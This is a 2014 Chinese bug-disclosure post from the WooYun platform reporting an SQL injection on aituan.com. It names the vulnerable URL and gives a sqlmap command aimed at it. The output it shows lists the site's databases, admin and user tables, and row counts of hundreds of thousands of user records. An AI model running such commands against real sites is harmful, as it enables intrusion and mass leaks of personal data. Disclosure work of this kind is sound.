爱团网主站SQL注入(可能导致百万计用户泄露)

漏洞详情

披露状态:

2014-03-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

伴随着"公路之歌"中的吉他声,我来了...

详细说明:

感谢某站的友情链接加快了我来到爱团的步伐。

#1 注入点

http://www.aituan.com/duobao/1547

检测类型

sql_1.png

#2 懒了,跑吧

sqlmay -u "http://www.aituan.com/duobao/1547*" --dbms="mysql" --time-sec=2 --ignore-proxy --current-user --current-db

sql_2.png

漏洞证明:

Database: aituan_test
[28 tables]
+---------------------------------------+
| at_ad |
| at_admin |
| at_admin_log |
| at_collect |
| at_config |
| at_feedback |
| at_gift |
| at_gift_consume |
| at_indiana |
| at_indiana_order |
| at_links |
| at_match |
| at_product |
| at_product_attribute |
| at_product_category |
| at_product_count |
| at_product_hits |
| at_product_style |
| at_seller |
| at_seller_count |
| at_seller_notice |
| at_user |
| at_user_address |
| at_user_details |
| at_user_product |
| at_user_score |
| at_user_ticket |
| at_user_verify |
+---------------------------------------+

Database: aituan
[58 tables]
+---------------------------------------+
| at_ad |
| at_admin |
| at_test |
| at_user |

...略

Database: aituan1515
[83 tables]
+---------------------------------------+
| at_activity_guanggao |
| at_activity_visit |
| at_admin |

...略

Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |

...略

Database: test
[1 table]
+---------------------------------------+
| at_double_count |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |

...略



count了一下aituan库

Database: aituan
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| at_indiana_order | 1390489 |
| at_user_score | 1381200 |
| at_user | 664522 |
| at_user_score_spend | 511283 |
...略



只是测试,没动丝毫数据。

修复方案:

别的先不说,赶紧拎起手中的键盘修复了吧:)

版权声明:转载请注明来源 Comer@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价: